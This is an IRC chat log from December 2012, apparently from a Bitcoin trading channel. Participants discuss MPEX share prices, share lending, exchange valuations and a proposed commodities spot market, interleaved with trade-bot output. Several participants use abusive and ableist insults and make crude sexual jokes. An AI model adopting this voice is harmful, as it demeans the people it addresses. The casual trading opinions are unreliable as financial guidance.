20:30:15 welll Dec 17 20:30:32 actually, only 208 shares bot at .0018 Dec 17 20:30:36 Doffx, there's no such thing as bitfunder bot. deadterra decided to consider even coinbr as a competition Dec 17 20:30:36 big whoop Dec 17 20:30:58 so they divided the "cake" between bitfunder and btct only Dec 17 20:31:01 Oh I was kidding around. Dec 17 20:31:14 What was this 10 BTC thing with Bitfunder? Dec 17 20:31:21 ? Dec 17 20:31:33 Said something about 10btc being split but I couldnt find info on what it was talking about Dec 17 20:31:55 oh, hairs were been split aplenty Dec 17 20:32:26 I use Hashpower, and weexchange, and have talked to Ukto so I went with bitfunder. Dec 17 20:32:42 I already sold 100 shares woo! Dec 17 20:41:48 I don’t know anything about the other exchanges, I have not been keeping up with the bitcoin word these days. Dec 17 20:44:16 here Dec 17 20:45:03 Doffx: https://bitcointalk.org/index.php?topic=130754.0 Dec 17 20:45:20 terra didn't formally announce it in the thread out of uh.. fairness? to the other exchange Dec 17 20:45:28 but allowed me to notice ppl on it at teh claims page Dec 17 20:45:33 alright, time to put in a low bid on s.dice Dec 17 20:45:36 again Dec 17 20:47:18 Doffx: once things are settled and terra says go, 10btc will be split out amongst the BF claimers (claim data is maintained) Dec 17 20:47:31 Oh, sweet. Dec 17 20:47:41 Thanks! Dec 17 20:47:46 so the fewer shreholders pick BF, the moreyou get :P Dec 17 20:48:30 Haha, id rather more picked it, id give them my share to make it more succesful. Dec 17 20:51:35 giving things never made anything more successful. Dec 17 20:52:28 I think you understud my meaning. Dec 17 20:53:59 [MPEX] [S.DICE] 1200 @ 0.0023177 = 2.7812 BTC [+] Dec 17 20:54:01 [MPEX] [S.DICE] 6000 @ 0.00282866 = 16.972 BTC [+] Dec 17 20:55:38 [MPEX] [S.MPOE] 4321 @ 0.00061297 = 2.6486 BTC [-] Dec 17 20:55:40 [MPEX] [S.MPOE] 17150 @ 0.00061276 = 10.5088 BTC [-] Dec 17 20:55:41 [MPEX] [S.MPOE] 26679 @ 0.00061233 = 16.3364 BTC [-] Dec 17 20:56:16 mircea_popescu: i'm now facinated by the differences in option valuation between mpoebot and the one i've written Dec 17 20:56:51 mircea_popescu: i will be at a terminal soon Dec 17 20:56:57 with a real keyboard Dec 17 20:58:14 smickles is it a lot ? Dec 17 20:58:23 mircea_popescu: no, it's subtle Dec 17 20:58:29 interesting Dec 17 20:59:07 it's why I asked about the volatility last night, the calc of that could be the difference Dec 17 20:59:17 possibly ya Dec 17 21:00:37 mircea_popescu: I'm here. Ahhh it feels good to type on a real keyboard. So many more WPM's Dec 17 21:00:43 [MPEX] [S.MPOE] 4321 @ 0.0006232 = 2.6928 BTC [+] Dec 17 21:00:44 [MPEX] [S.MPOE] 4321 @ 0.00062343 = 2.6938 BTC [+] Dec 17 21:00:44 wb Dec 17 21:00:45 [MPEX] [S.MPOE] 2608 @ 0.00062348 = 1.626 BTC [+] Dec 17 21:00:48 ty Dec 17 21:01:48 [MPEX] [O.BTCUSD.C130T] 200 @ 0.09066871 = 18.1337 BTC [-] Dec 17 21:01:48 d'ya'll think people are shorting s.dice on this double spend news? Dec 17 21:01:50 okay so as we talked about with physically delivery of futures, I started analyzing the possibility of physical delivery for procurement. Since BTC volume is so low it would end up being procurement for local stores and not full fledged chains. Dec 17 21:02:03 [MPEX] [O.BTCUSD.C120T] 525 @ 0.12333198 = 64.7493 BTC [-] Dec 17 21:02:20 C13 ?!! C12! where's my C14! :P Dec 17 21:02:38 smickles: that made me burst out laughing in this store Dec 17 21:02:50 lol Dec 17 21:03:10 someone should make a top of the weirdest trades on mpex Dec 17 21:03:15 [MPEX] [S.MPOE] 4321 @ 0.00061266 = 2.6473 BTC [-] Dec 17 21:03:15 [MPEX] [S.MPOE] 4321 @ 0.00061256 = 2.6469 BTC [-] Dec 17 21:03:17 [MPEX] [S.MPOE] 7062 @ 0.00061233 = 4.3243 BTC [-] Dec 17 21:03:18 [MPEX] [S.MPOE] 4396 @ 0.00061184 = 2.6896 BTC [-] Dec 17 21:03:22 the sdice for 18 is not quite as big as the idiff.jun for 0.03 Dec 17 21:03:43 really? Dec 17 21:03:52 there's an idiff.jun for .03? Dec 17 21:04:00 a trade flashed. 70 units. Dec 17 21:04:03 yest Dec 17 21:04:14 oh Dec 17 21:04:36 yes it was VERY yummy Dec 17 21:04:54 [MPEX] [S.DICE] 15513 @ 0.0037 = 57.3981 BTC [+] Dec 17 21:05:11 dunno who put it there, but i'd get gay with them Dec 17 21:05:58 don't have enough money as is jurov? Dec 17 21:06:06 mircea_popescu: is that still unclear? Dec 17 21:06:07 lol Dec 17 21:06:49 i'm not sure that an individual can have too much money to benefit by more Dec 17 21:07:05 thestringpuller well, what diff does it make if it's chains or stores ? Dec 17 21:07:15 Wow, 0037 now Dec 17 21:07:17 volume, chains expect a certain price Dec 17 21:07:17 large amounts should just shift their timescales beyond their own expected lifetime Dec 17 21:07:21 start small and move up Dec 17 21:07:27 for instance with the cocoa example Dec 17 21:07:53 most people who would want end-user procurement of a commodities contract would be someone likely to distribute to a small coffee shop Dec 17 21:08:15 they would be willing to pay a little over 100 Dec 17 21:08:23 err Dec 17 21:08:27 over 1%* Dec 17 21:08:45 on market price as long as they could sustain end user prices in the coffee shops and bakeries Dec 17 21:09:06 what makes you think that most buyers of the future would buy to have it delivered ? Dec 17 21:09:09 there is a lot of markup to eat into on coffee Dec 17 21:09:17 not futures spot commodities Dec 17 21:10:19 but I suppose if someone who had a future that matured and had a distribution network may want delivery Dec 17 21:10:36 but I'm more talking about being able to purchase commodites at a market price via btc Dec 17 21:10:46 what sense does it make to have a centralised spot market when nobody can take centralised delivery ? Dec 17 21:10:58 spot markets evolved historically and make sense in conjunction with a delivery spot. Dec 17 21:11:08 elaborate a bit Dec 17 21:11:16 [MPEX] [S.DICE] 7849 @ 0.0037 = 29.0413 BTC [+] Dec 17 21:11:23 ;;define "SPOT" Dec 17 21:11:23 Error: "define" is not a valid command. Dec 17 21:11:59 oh in that case would delivery in BTC be slightly decentralized due to it's internet nature? Dec 17 21:12:12 more so than railroad crossings or ports Dec 17 21:12:22 much more so. Dec 17 21:12:29 basically this'd be more like bitmit for cocoa Dec 17 21:12:35 ;;ident Dec 17 21:12:35 You are not identified. Dec 17 21:12:41 oh and i *swear* i saw X.IDIFF.SEP selling for 2 satoshi, but once i got ahold of my coinbr acct, it vanished Dec 17 21:12:42 which isn't a bad thing, but it doesn't make sense to lump it all under a generic name Dec 17 21:13:20 in a sense it wouldn't but in a sense it would? Dec 17 21:13:43 the example I mulled around in my head was a case where MPEX would have a listing for something like Cocoa Dec 17 21:14:10 [MPEX] [S.MPOE] 4321 @ 0.0006232 = 2.6928 BTC [+] Dec 17 21:14:20 that listing would correlate to any number of suppliers that constitute a BTC union Dec 17 21:15:18 so there would be likely 2 factors in pricing: geographical location of the supplier (i.e. freight) and 2. the base price the supplier is offering on his commodities Dec 17 21:15:34 which is what makes this slightly inadequate for a spot-type exchange traded thing Dec 17 21:15:54 in a spot exchange the supplier delivers to the exchange no? Dec 17 21:16:13 i feel like chicago has a lot of train yards and people deal with it there Dec 17 21:16:32 nah, exchange does not take delivery. Dec 17 21:16:40 clearing house clears the deliveries both ways Dec 17 21:16:54 but usually to specifc freight yards no? Dec 17 21:17:04 which seem to be influenced by the location of the exchange Dec 17 21:17:23 !ticker s.dice Dec 17 21:17:24 [MPEX:S.DICE] 1day: 0.0018 / 0.00351473 / 0.0037 (1526236 shares, 5,364.31 BTC), 30day: 0.0018 / 0.00340547 / 0.0037 (6468105 shares, 22,026.96 BTC) Dec 17 21:17:39 which is why exchanges are located in specific places Dec 17 21:17:59 yes but in since volume will start low on MPEX vs the 1000's of farms that sell on CME Dec 17 21:18:03 ;;sell 1 S.DICE @ 0.2 "%/day" Lending S.DICE at .2% per day based on the 1day average Dec 17 21:18:04 Order id 12371 created. Dec 17 21:18:22 ;;view 12371 Dec 17 21:18:23 #12371 Mon Dec 17 11:18:07 2012 smickles SELL 1.0 S.DICE @ 0.2 %/day (Lending S.DICE at .2% per day based on the 1day average) Dec 17 21:18:30 I feel as though it is completely possible Dec 17 21:18:36 to decentralize the clearing house Dec 17 21:19:00 thus someone in istaanbuul can sell columbian coffee to spoiled americans Dec 17 21:19:03 all from his computer Dec 17 21:19:06 that's not really tyhe point. the point is that if you're decentralizing the clearing house why are you centralizing price formation Dec 17 21:19:12 it's pure distortion, has no economic basis. Dec 17 21:19:17 oh Dec 17 21:19:25 wouldn't the price set it self based on the suppliers? Dec 17 21:19:34 "price" is meaningless inthis context Dec 17 21:19:52 cause cocoa for (instanbul to budapest) is different from price in (cote d'ivoire to atlanta) Dec 17 21:19:54 [MPEX] [S.MPOE] 8550 @ 0.00062348 = 5.3308 BTC [+] Dec 17 21:19:55 [MPEX] [S.MPOE] 3350 @ 0.00062348 = 2.0887 BTC [+] Dec 17 21:20:01 i don't understand how price formation is centralized if it is primarily influenced by the supplier? Dec 17 21:20:11 i apologize for the confusion Dec 17 21:20:11 cause mpex is one Dec 17 21:20:22 you want 500 mpexes all over the world ? Dec 17 21:20:44 if they had 500 mpoe-pr's ? why not Dec 17 21:20:53 god. Dec 17 21:21:03 mpex exists on the internet and only on the internet no? Dec 17 21:21:18 sure it is hosted on servers located in romania Dec 17 21:21:36 is it tho? Dec 17 21:21:40 but what would be the physical trade floor is a computer terminal connected to the internet Dec 17 21:21:51 actually its located in atlanta. Dec 17 21:22:25 ;;sell 1 S.MPOE @ 0.2 "%/day" Lending S.MPOE at .2% per day based on the 1day average Dec 17 21:22:26 Order id 12372 created. Dec 17 21:22:32 on that news ;D Dec 17 21:22:52 thestringpuller, why should someone in the California (if coffee would be grown there) have the same price as someone in Nepal? Dec 17 21:23:24 i mean, suppliers Dec 17 21:23:25 jurov: buying or selling? Dec 17 21:23:27 okay Dec 17 21:23:34 smickles 6% per month ? nice deal. Dec 17 21:24:11 mircea_popescu: someone taking my deal with s.dice could've already made a bunch of btc Dec 17 21:24:13 thestringpuller let's get it this other way : there's 20 geographically distinct markets. in one of them there's a shortage. that guy goes and buys moar cocoa. drives price up Dec 17 21:24:17 FOR EVERYBODY Dec 17 21:24:24 [MPEX] [S.MPOE] 19000 @ 0.00062345 = 11.8456 BTC [-] Dec 17 21:24:26 people in 19 markets pay more cause some douche peed in his cocoa stores. Dec 17 21:24:39 smickles true that. Dec 17 21:24:54 nowait. you're lending it. Dec 17 21:25:02 how'd he have made money shorting it ? it's up Dec 17 21:25:24 mircea_popescu: the sell at .0037, buy at .0018, ruturn the shares Dec 17 21:25:51 only 2 times Dec 17 21:25:56 (that's just the optimal example)\ Dec 17 21:25:58 has that happened smickles Dec 17 21:25:59 lol Dec 17 21:26:04 lol ya right, and they got lucky to be hit at 18 Dec 17 21:26:16 thestringpuller: client privledge Dec 17 21:26:27 it's more likely to findsome btc in the park lying on the ground. Dec 17 21:27:19 mircea_popescu: would it be profitable if they did the sell at 35 buy at 32? Dec 17 21:27:31 [MPEX] [S.MPOE] 33100 @ 0.00062348 = 20.6372 BTC [+] Dec 17 21:27:33 [MPEX] [S.MPOE] 3800 @ 0.00062586 = 2.3783 BTC [+] Dec 17 21:27:48 ;;calc (35 - 32)/35 Dec 17 21:27:49 0.0857142857143 Dec 17 21:27:56 yea Dec 17 21:27:57 ;D Dec 17 21:28:43 like I said, the 37/18 was just the optimal situation. (something that all those elliot wavers seem to forget) Dec 17 21:28:56 mircea_popescu: i feel like your example is indicating arbitrage is built in Dec 17 21:29:24 what if there was an exchange at each supplier Dec 17 21:29:48 like with spot exchanges (like CME I guess), wouldn't one supply shortage result in some trader doing argritrage? Dec 17 21:29:56 if he can transport it. Dec 17 21:30:03 arbitrage is meaningless if you can't close the cycle. Dec 17 21:30:25 so if there is a shortage in one location, then wouldn't he have to transport it from a farther location? Dec 17 21:30:33 given your scenario Dec 17 21:31:11 he wouldn't have to. Dec 17 21:31:18 if he had the ability to he might arbitrage Dec 17 21:31:53 i feel as though new trading strategies would arise due to this Dec 17 21:31:59 if the price went up for everyone Dec 17 21:32:09 lol at this cocoa price bs. Over 4 mil tons of cocoa gets produced per year Dec 17 21:32:12 due to a shortage in one geographical location Dec 17 21:32:21 thestringpuller: what location? Dec 17 21:32:32 in the location in mircea_popescu scenario Dec 17 21:32:45 EskimoBob: yeah but every american consumes 4 mil tonnes of chocolate per annum Dec 17 21:33:31 [MPEX] [S.DICE] 3996 @ 0.00273502 = 10.9291 BTC [-] Dec 17 21:33:32 every ? sure. On what planet? Dec 17 21:33:59 on thunderchunk in the fatobar system Dec 17 21:34:12 so mircea_popescu if I can prevent a geogrpahical shortage in one location from affecting the entire market, the main issue you see will be solved? Dec 17 21:34:14 https://bitcointalk.org/index.php?topic=130117.msg1405474#msg1405474 lol ukto got caught with pants down Dec 17 21:34:19 over here it's 6 mil tons and it goes straight to ass Dec 17 21:34:39 no thestringpuller. the main issue is that a single price is meaningless for a fragmented set of random submarkets. Dec 17 21:34:48 you'll need multiprices. Dec 17 21:35:00 shit kurweil works at google now Dec 17 21:35:06 so a composite? Dec 17 21:35:07 *kurzweil Dec 17 21:35:41 maybe a composite, maybe just a simple auction-type site Dec 17 21:36:06 I see. Dec 17 21:36:31 That's actually not half bad... Dec 17 21:36:37 you guys have talked about this for days now. Let me ask this: what is this added value you offer for clients? Dec 17 21:36:38 if you can pull it off Dec 17 21:37:03 btw, to anyone who rememebers Dec 17 21:37:05 20:33.46 ( @gribble ) markedathome was last seen in #bitcoin-otc-eu 33 weeks, 5 days, 6 hours, 46 minutes, and 6 seconds ago: mcorlett: i'll help test if it is needed within the next 4 hours Dec 17 21:37:07 he is back! Dec 17 21:37:49 but hey Dec 17 21:37:50 at least I admit it Dec 17 21:37:51 :P Dec 17 21:38:09 Well mircea_popescu if you are willing to believe in me, I will pull it off. Dec 17 21:38:11 hehe. one of the advantages of starting slow, you catch these things before they do damage Dec 17 21:38:26 thestringpuller that's what god said. Dec 17 21:38:30 XD Dec 17 21:38:42 "Does anyone actually think MPEX is worth $8.4 Million USD? Seems WAY overvalued to me (like 1-2 orders of magnitude)." Dec 17 21:39:01 !ticker S.MPOE Dec 17 21:39:03 [MPEX:S.MPOE] 1day: 0.0006088 / 0.00062618 / 0.0006361 (2450793 shares, 1,534.65 BTC), 30day: 0.00049308 / 0.00053193 / 0.00063995 (100441234 shares, 53,428.11 BTC) Dec 17 21:39:03 sell mortimer sell Dec 17 21:39:05 i love the shock people get when they discover that... wait!!!! while we knew better and ignoed gpg and didn't user irc and etc stuff was happening! Dec 17 21:39:08 HOW DARES IT! Dec 17 21:39:27 mircea_popescu: is it 10 billion shares total? Dec 17 21:39:28 Ukto is do in a superb job Dec 17 21:39:35 thestringpuller 1bn Dec 17 21:39:52 ca me faci Dec 17 21:39:58 and look, he has no need for a hysterical sociopath cunt, to represent him :) Dec 17 21:39:59 o hai Dec 17 21:40:02 ;;calc 1000000000 * .00062618 Dec 17 21:40:02 626180 Dec 17 21:40:03 ;;ticker Dec 17 21:40:04 BTCUSD ticker | Best bid: 13.24012, Best ask: 13.24013, Bid-ask spread: 0.00001, Last trade: 13.24012, 24 hour volume: 77060.65520210, 24 hour low: 12.74919, 24 hour high: 13.49800, 24 hour vwap: 13.20606 Dec 17 21:40:21 ;;calc 626180 * 13.20606 Dec 17 21:40:22 8269370.6508 Dec 17 21:40:27 seems about right... Dec 17 21:40:31 the valuation Dec 17 21:40:31 at least mpex isn't named magic the gathering online exchange Dec 17 21:40:33 thestringpuller: make it hundred billion Dec 17 21:40:34 Lyspooner http://www.reddit.com/r/Bitcoin/comments/14zxqr/mpex_over_1_million_btc_total_market_cap/ this i fac. Dec 17 21:40:46 yeah yeah Dec 17 21:40:49 toot that horn Dec 17 21:40:59 looks bigger and more important :P Dec 17 21:41:22 allow me to select an adequate picture Dec 17 21:41:41 http://polimedia.us/dtng/c/src/134206824088.jpg Dec 17 21:41:43 there you go Dec 17 21:43:04 is that a sex picture Dec 17 21:43:08 i bet it is Dec 17 21:43:24 click and find out Dec 17 21:43:25 MBOR is the bond name? Dec 17 21:43:27 i'm not going to click the link, but you guys feel free to verbally describe it to me Dec 17 21:43:30 thestringpuller yup Dec 17 21:43:41 5-6% is the interest the bot is guarenteeing? Dec 17 21:43:44 jcpham i'll pay you .001 btc to click it Dec 17 21:43:51 thestringpuller there's no guarantee. Dec 17 21:43:54 no way Dec 17 21:44:07 I wouldnt call it sex, but there us nudity. Dec 17 21:44:13 i bill hourly Dec 17 21:44:19 is* you should check it out. Dec 17 21:44:21 you can have it in an hour the Dec 17 21:44:39 i can't work for .001 hourly Dec 17 21:44:46 i'll never eat with those wages Dec 17 21:45:07 so lose wait, get a better job eating out. Dec 17 21:45:21 sounds sexual Dec 17 21:45:23 mircea_popescu: well what is the safe zone for right now is 5-6% no? Dec 17 21:45:29 did you just come on to me Dec 17 21:45:30 i would think so ya Dec 17 21:46:01 thanks for the discussion on that idea mircea_popescu, much appreciated. I guess we'll talk again soon. Dec 17 21:46:06 ok i clicked the link Dec 17 21:46:15 well.. as long as he doesnt cum onto you, your prolly safe Dec 17 21:46:16 addy ? Dec 17 21:46:22 just dont goto Romania :P Dec 17 21:46:30 yucky Dec 17 21:46:53 Doffx i like how her tattoos seem to be drowning on her Dec 17 21:47:23 I would have thought you mostly liked the bag in her hand :P Dec 17 21:47:32 Look at how btct.co, litecoinglobal.com, bitfunder.com, cryptostocks.com and so on get their clients. Learn something. Evolve, for fuck sake! Dec 17 21:47:49 EskimoBob: would that be the, relying on your customers to be retarded method? Dec 17 21:48:11 dub don't mess with him, he's listed an ART asset. Dec 17 21:48:36 i love the short bus Dec 17 21:48:42 the A/C is colder Dec 17 21:48:51 tis true... Dec 17 21:49:21 ... Dec 17 21:49:25 beingtall on the short bus has the advantage you don't sniff aanyone's farts. Dec 17 21:49:36 Heat rises Dec 17 21:49:54 where I went to school, the short bus had the intelegent peeps on it, social welfare allowed the large busses to be taken up by the 'short bus' peeps Dec 17 21:50:20 intelegent peeps << :D Dec 17 21:50:21 https://bitcointalk.org/index.php?topic=131270.0 Dec 17 21:50:33 the only short bus reference I am aware of is that movie with lots of gay sex in it Dec 17 21:50:45 o hey jurov ! Dec 17 21:50:46 is there some other meaning? Dec 17 21:51:17 [MPEX] [S.MPOE] 4050 @ 0.00062553 = 2.5334 BTC [-] Dec 17 21:51:48 jurov why the alternate month structure ? Dec 17 21:52:29 seemed like a waste to keep re-creating assets Dec 17 21:52:33 we did not found a sane way how to cram it into one asset Dec 17 21:52:48 since theres a month of fundraising Dec 17 21:52:49 a sio this way it can trade/invest/trade/invest sorta thing ? Dec 17 21:52:49 prior Dec 17 21:52:57 yes Dec 17 21:53:00 kinda interesting. Dec 17 21:53:07 now you can make an index of 1:1 over them lol Dec 17 21:53:10 1 month of fundraising, then it buys bond, a month of trading Dec 17 21:53:11 then liquid Dec 17 21:53:12 reset Dec 17 21:53:58 yup Dec 17 21:54:04 pretty slick. Dec 17 21:54:43 jurov prolly need some verbiage abouty what if 100btc aren't raised. Dec 17 21:55:11 we thought you would cover the shortfall Dec 17 21:55:12 >:P Dec 17 21:55:16 j/k Dec 17 21:55:30 lol Dec 17 21:55:38 mircea_popescu: hell ya i can spell :D Dec 17 21:55:46 haha, no i'm sure there will be someone interested around #otc to provide few tens of btcs or so Dec 17 21:56:02 i don't have any more money, i bought the bitfunder passthrough to cryptostocks shares investing in s.mpoe Dec 17 21:56:07 and we will cover something ourselves Dec 17 21:56:20 0,o Dec 17 21:56:34 "some things" Dec 17 21:56:34 :P Dec 17 21:56:39 LOL Dec 17 21:56:57 how are the murder laws in Romania nowdays? :P Dec 17 21:57:19 lol WE ARE GETTING TOO BIG TO FAIL Dec 17 21:57:29 :P Dec 17 21:57:44 [MPEX] [S.MPOE] 271 @ 0.00062553 = 0.1695 BTC [-] Dec 17 21:57:46 [MPEX] [S.MPOE] 18179 @ 0.00062586 = 11.3775 BTC [+] Dec 17 21:57:55 I has stack of 200 now... >,> Dec 17 21:58:19 I bought a few. Dec 17 21:58:30 oh btw Doffx Dec 17 21:58:40 Did you see the dividend reinvestment stuff on BF? Dec 17 21:58:43 >:P Dec 17 21:58:53 Yes I did. Dec 17 22:03:10 Well after the dust has settled it looks like I made quite a bit from the passthrough Dec 17 22:03:27 i just had a thought about satoshidice Dec 17 22:03:38 so it should take 1.9%. for many months through variance it was more like 1% Dec 17 22:03:42 recently it moved to about 2%. Dec 17 22:03:53 it is after all perfectly possible it just jumps to 3% for a few months... Dec 17 22:04:55 [MPEX] [S.MPOE] 4321 @ 0.00062576 = 2.7039 BTC [-] Dec 17 22:04:57 [MPEX] [S.MPOE] 1321 @ 0.00062586 = 0.8268 BTC [+] Dec 17 22:04:58 [MPEX] [S.MPOE] 4000 @ 0.00062711 = 2.5084 BTC [+] Dec 17 22:04:59 [MPEX] [S.MPOE] 20346 @ 0.00062767 = 12.7706 BTC [+] Dec 17 22:07:03 hahaha, mpoe-pr endorses us :P Dec 17 22:07:09 mircea_popescu: A stock can be made of a composite of price non? Dec 17 22:07:18 prices* Dec 17 22:07:18 that wouldn't be a stock tho Dec 17 22:07:25 some fund/etf/something Dec 17 22:07:28 what would it be at that point Dec 17 22:07:30 a fund Dec 17 22:07:32 ah Dec 17 22:07:43 thank you for educating me Dec 17 22:07:45 [MPEX] [S.MPOE] 2370 @ 0.00062767 = 1.4876 BTC [+] Dec 17 22:07:46 [MPEX] [S.MPOE] 16167 @ 0.00062836 = 10.1587 BTC [+] Dec 17 22:07:48 [MPEX] [S.MPOE] 6963 @ 0.00063252 = 4.4042 BTC [+] Dec 17 22:08:37 [MPEX] [S.MPOE] 4321 @ 0.00062365 = 2.6948 BTC [-] Dec 17 22:08:39 [MPEX] [S.MPOE] 2252 @ 0.00062345 = 1.404 BTC [-] Dec 17 22:08:40 [MPEX] [S.MPOE] 12827 @ 0.00062181 = 7.976 BTC [-] Dec 17 22:08:43 !ticker S.DICE Dec 17 22:08:44 [MPEX:S.DICE] 1day: 0.0018 / 0.00357565 / 0.0037 (981811 shares, 3,510.62 BTC), 30day: 0.0018 / 0.00340505 / 0.0037 (6472101 shares, 22,037.89 BTC) Dec 17 22:09:29 kinda ripping off the 007 bond on glbse Dec 17 22:09:42 wha was that ? Dec 17 22:10:00 a mining bond Dec 17 22:10:45 just he james bond word play aspect Dec 17 22:11:01 is there a way to return the ask bid and last price on a stock? Dec 17 22:11:10 or do i gotta go to mpex.co Dec 17 22:11:12 mpex.co ? Dec 17 22:12:23 the assbot ticjer Dec 17 22:12:26 ticker* Dec 17 22:13:40 smickles: how long will you ve offering the lending deal on S.DICE Dec 17 22:14:02 be* Dec 17 22:18:31 dub: when did you become mircea_popescu sock puppet? LOL Dec 17 22:19:25 EskimoBob: someone needs to offset your frothy mouthed table thumping Dec 17 22:20:53 ukto i got the 2 btc Dec 17 22:21:16 what 2btc? Dec 17 22:21:23 could we raose the price to 4 btc for all 3 discs Dec 17 22:21:29 ff7 Dec 17 22:21:31 ooh Dec 17 22:21:32 that Dec 17 22:21:38 i have been pretty busy all morning Dec 17 22:21:42 havent even had a chance Dec 17 22:21:52 dub: what that even means? Dec 17 22:23:22 :P Dec 17 22:24:25 Ukto: if you find it and it is workig ehat is your price for all 3 Dec 17 22:24:31 Hell, its much worse than burning. Dec 17 22:25:13 [MPEX] [S.MPOE] 4321 @ 0.00062189 = 2.6872 BTC [+] Dec 17 22:25:14 [MPEX] [S.MPOE] 11779 @ 0.00062181 = 7.3243 BTC [-] Dec 17 22:25:51 thestringpuller: sure. Dec 17 22:26:45 EskimoBob: at some point I recall enjoying the odd diatribe you emmited but now you just seem to show up and blather incoherently in any thread containing a poster you dont approve of. You are basically ciuciu 2.0 Dec 17 22:27:33 really? Dec 17 22:31:44 a table thumper is that person in the corporate world that operates by being overly forcefull, loud and petulant. They sometimes get results because other parties give in to their position because its easier to just make them go away but ultimately nobody wants to deal with them and they end up managed out of any position of relevance Dec 17 22:35:53 EskimoBob, try to read that shit in "Gamma SatoshiDICE Pass Through" thread after yourself. really Dec 17 22:36:10 [MPEX] [S.MPOE] 4321 @ 0.00063105 = 2.7268 BTC [+] Dec 17 22:36:11 [MPEX] [S.MPOE] 1848 @ 0.00063129 = 1.1666 BTC [+] Dec 17 22:37:24 [MPEX] [S.MPOE] 4321 @ 0.00062571 = 2.7037 BTC [-] Dec 17 22:37:24 [MPEX] [S.MPOE] 2179 @ 0.00062553 = 1.363 BTC [-] Dec 17 22:38:44 jurov: someone made a post after me you do not like? Dec 17 22:40:34 no. you did and apprently forgot Dec 17 22:41:01 I see that angry "PR" joke blabbering something. Maybe you need to talk to her? Dec 17 22:42:09 WRT that quote about how these other 'exchanges' get their clients, seems to me that they are just mopping up the jizz left behind by nefario and the only clients they will get are those still convinced the GLBSE model works Dec 17 22:42:40 [MPEX] [S.MPOE] 4321 @ 0.00063107 = 2.7269 BTC [+] Dec 17 22:42:41 haha Dec 17 22:42:42 [MPEX] [S.MPOE] 887 @ 0.00063129 = 0.56 BTC [+] Dec 17 22:42:45 5dimes.eu is sooooo sketchy Dec 17 22:43:06 lol Dec 17 22:43:13 you ever used? Dec 17 22:43:17 people willing to completely ignore teh probable illegality of it all or convinvced that thesse 'JUST FOR TESTING NOT A REAL EXCHANGE LOL' clauses in the tos will protect anyone Dec 17 22:43:31 good one Dec 17 22:44:00 i think they need to add a picture of a unicorn and PGP key. Then it will be OK? Dec 17 22:44:19 not unicorn. mermaid Dec 17 22:44:32 even better Dec 17 22:44:43 add both :) Dec 17 22:44:51 https://sphotos-b.xx.fbcdn.net/hphotos-ash3/34710_546096738752926_1072646876_n.jpg Dec 17 22:45:04 oh thats funny Dec 17 22:45:11 cryptostocks changed their graphs Dec 17 22:45:15 to the same one I use Dec 17 22:45:38 they didnt pay tho :P Dec 17 22:45:50 and, didnt configure it fully Dec 17 22:46:22 the redeeming factor of MPEX is you actually have to at least have some significant motivation if not >0.1$ of a clue about finance to get a seat, it'll be hard to argue that the typical mom and pop retards fell into investing on it Dec 17 22:46:39 er s/$/% Dec 17 22:47:28 in fact Dec 17 22:47:38 its misconfigured volume wise Dec 17 22:47:43 jurov: and maybe a questionable use of .us TLD helps and lets not forget some porn for spice. Then everything becomes legal Dec 17 22:47:45 LOL Dec 17 22:47:59 when the volume seciton on their graphs group up trades, its displaying the lowerst volume count Dec 17 22:48:06 section Dec 17 22:48:10 groups Dec 17 22:48:17 oh were back to porn, hi ciuciu Dec 17 22:48:33 oh, and lowest Dec 17 22:48:33 wow Dec 17 22:48:37 [MPEX] [S.MPOE] 4321 @ 0.00063094 = 2.7263 BTC [-] Dec 17 22:48:39 [MPEX] [S.MPOE] 16865 @ 0.00063129 = 10.6467 BTC [+] Dec 17 22:48:40 [MPEX] [S.MPOE] 3064 @ 0.00063252 = 1.938 BTC [+] Dec 17 22:48:52 Ukto: it's probably good to cut of the huge spikes so the regular stuff is still visible Dec 17 22:50:13 hge price spikes? Dec 17 22:50:21 no, vol Dec 17 22:50:55 I was debating making it aler Dec 17 22:50:56 taller Dec 17 22:51:03 one huge trade renders the whole chart useless - what's the point Dec 17 22:51:30 taller? will not really help you if the difference is huge. It's just a waste of space Dec 17 22:52:02 oh, i just ment in general Dec 17 22:52:07 its too squat I think Dec 17 22:52:09 not unicorn. mermaid << dragon approves of this notion. Dec 17 22:52:19 i like unicorns Dec 17 22:52:29 I need to hide an esteregg on the site somewhere Dec 17 22:52:34 mermaid.. unicorn Dec 17 22:52:40 pony? Dec 17 22:52:42 ctrl alt f4 Dec 17 22:52:43 and pay ppl 100satoshi to find it Dec 17 22:52:43 :P Dec 17 22:52:47 ^ unicorn hotkey ^ Dec 17 22:52:48 the ones with rainbows Dec 17 22:53:06 [MPEX] [S.MPOE] 4321 @ 0.00062563 = 2.7033 BTC [-] Dec 17 22:53:07 [MPEX] [S.MPOE] 15229 @ 0.00062553 = 9.5262 BTC [-] Dec 17 22:53:14 wow Dec 17 22:53:59 I just came up with an interesting idea.. on how to use the rules for liars poker.. in an multi-player browser based isometric game.... Dec 17 22:54:11 the stupid shit that comes to mind when your sleep deprived. Dec 17 22:54:30 spawned from unircorns and rainbows Dec 17 22:55:18 Ukto: for example, look at the http://bitcoincharts.com/markets/mtgoxEUR.html 60 day and 2 day chart. Forget the period those chart show. JUst look at the vol bars. Dec 17 22:55:36 ok, might as well make it public : re how many users mpex has : as per the monthly reports up until the end of nov it collected 2200 BTC in new user fees. Dec 17 22:55:47 some of these are 10 btc, some 20 and some 30. Dec 17 22:56:06 2 chart has mostly this chicken shit at the bottom, because few proportionally large trades Dec 17 22:56:15 so it is really pointless Dec 17 22:56:21 2 day Dec 17 22:56:38 EskimoBob: your saying done have it like the first chart, right? Dec 17 22:57:08 [MPEX] [S.MPOE] 4321 @ 0.00062586 = 2.7043 BTC [+] Dec 17 22:57:10 [MPEX] [S.MPOE] 1592 @ 0.00062553 = 0.9958 BTC [-] Dec 17 22:57:10 yes and no. This was just a illustration to show what happens to vol chart Dec 17 22:57:11 [MPEX] [S.MPOE] 2594 @ 0.00062181 = 1.613 BTC [-] Dec 17 22:57:12 [MPEX] [S.MPOE] 5666 @ 0.00061993 = 3.5125 BTC [-] Dec 17 22:57:13 [MPEX] [S.MPOE] 14427 @ 0.00061185 = 8.8272 BTC [-] Dec 17 22:57:29 How much did it collect in just Nov? Dec 17 22:57:50 if you cut off the unusual spikes, you get nice useful chart like the first one there Dec 17 22:58:39 http://www.reddit.com/r/Bitcoin/comments/14zxqr/mpex_over_1_million_btc_total_market_cap/c7i3l5s Dec 17 22:58:51 lmao what a complete tard. Dec 17 23:00:17 so basically "o, can i short it ???" "yes, smickles lends shares" "but can i short it without going into mpex". Dec 17 23:00:26 people and their fixed ideas. Dec 17 23:01:18 [MPEX] 